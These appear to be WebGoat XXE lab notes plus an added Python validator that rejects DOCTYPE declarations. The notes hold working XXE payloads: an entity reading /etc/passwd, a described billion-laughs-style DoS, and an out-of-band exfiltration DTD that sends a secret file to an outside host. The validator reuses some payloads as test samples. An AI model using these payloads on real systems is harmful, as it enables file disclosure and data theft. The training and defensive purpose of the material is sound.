
The entity is already expanded by the time the server side stores the comment:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE author [
<!ENTITY js SYSTEM "file:///etc/passwd">
]>
<comment><text>&js;</text></comment>


The API does not restrict the body to JSON; sending XML works as well.



DoS: built a case of exponential entity expansion (each entity references the previous one several times, so the expanded size grows exponentially).

XXE out-of-band (OOB) data exfiltration, see https://www.invicti.com/learn/out-of-band-xml-external-entity-oob-xxe
The request body references an external DTD; the parameter entities do the work:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE data [
<!ENTITY % file SYSTEM "file:///home/webgoat/.webgoat-2025.3/XXE/csrf-zqqqqq/secret.txt">
<!ENTITY % dtd SYSTEM "http://xxx.226:12345/evil.dtd">
%dtd;
]>
<comment><text>&send;</text></comment>

Contents of evil.dtd, served from http://xxx.226:12345/:
<!ENTITY % all "<!ENTITY send SYSTEM 'http://xxx.226:12345/?collect=%file;'>">
%all;
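Added here as a defender-side example, not code from these notes or from WebGoat: a Python check for the comment API that refuses any body carrying a DOCTYPE before the real parser ever sees it, which removes the file:// entity, the exponential-expansion DoS and the parameter-entity OOB fetch in one go. The function names and the sample bodies are my own; it assumes the <comment><text>...</text></comment> body shape shown in the notes.

```python
import xml.parsers.expat as expat
import xml.etree.ElementTree as ET


class UnsafeXML(ValueError):
    """The body carried a DTD; the comment API never needs one."""


def reject_doctype(data: bytes) -> None:
    """First pass over the raw bytes: abort on any <!DOCTYPE ...>.
    No DTD means no entity declarations, so the file:// entity, the exponential
    expansion DoS and the parameter-entity OOB fetch are all stopped here."""
    p = expat.ParserCreate()
    # Belt and braces: never resolve parameter entities such as %dtd; either.
    p.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)
    def on_doctype(name, sysid, pubid, has_internal_subset):
        # Raising inside a handler stops expat and propagates out of Parse().
        raise UnsafeXML(f"DOCTYPE '{name}' rejected")

    p.StartDoctypeDeclHandler = on_doctype
    try:
        p.Parse(data, True)
    except expat.ExpatError as e:
        raise UnsafeXML(f"malformed XML: {e}") from e


def parse_comment(data: bytes) -> str:
    """Validate, then parse the API body and return the <text> content."""
    reject_doctype(data)
    root = ET.fromstring(data)
    text = root.find("text")
    if root.tag != "comment" or text is None:
        raise UnsafeXML("expected <comment><text>...</text></comment>")
    return text.text or ""


def classify(data: bytes) -> str:
    """Return 'ok:<text>' or 'rejected:<reason>' so results can be logged."""
    try:
        return "ok:" + parse_comment(data)
    except UnsafeXML as e:
        return "rejected:" + str(e)

# Constructed samples: a benign body plus the two payload shapes from the notes.
BENIGN = b"<comment><text>hello</text></comment>"
FILE_XXE = (b'<!DOCTYPE author [<!ENTITY js SYSTEM "file:///etc/passwd">]>'
            b"<comment><text>&js;</text></comment>")
OOB_XXE = (b'<!DOCTYPE data [<!ENTITY % dtd SYSTEM "http://xxx.226:12345/evil.dtd">'
           b"%dtd;]><comment><text>&send;</text></comment>")
```

Logging the rejection reason (and the DOCTYPE name) gives a simple detection signal for an API that should never receive a DTD.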

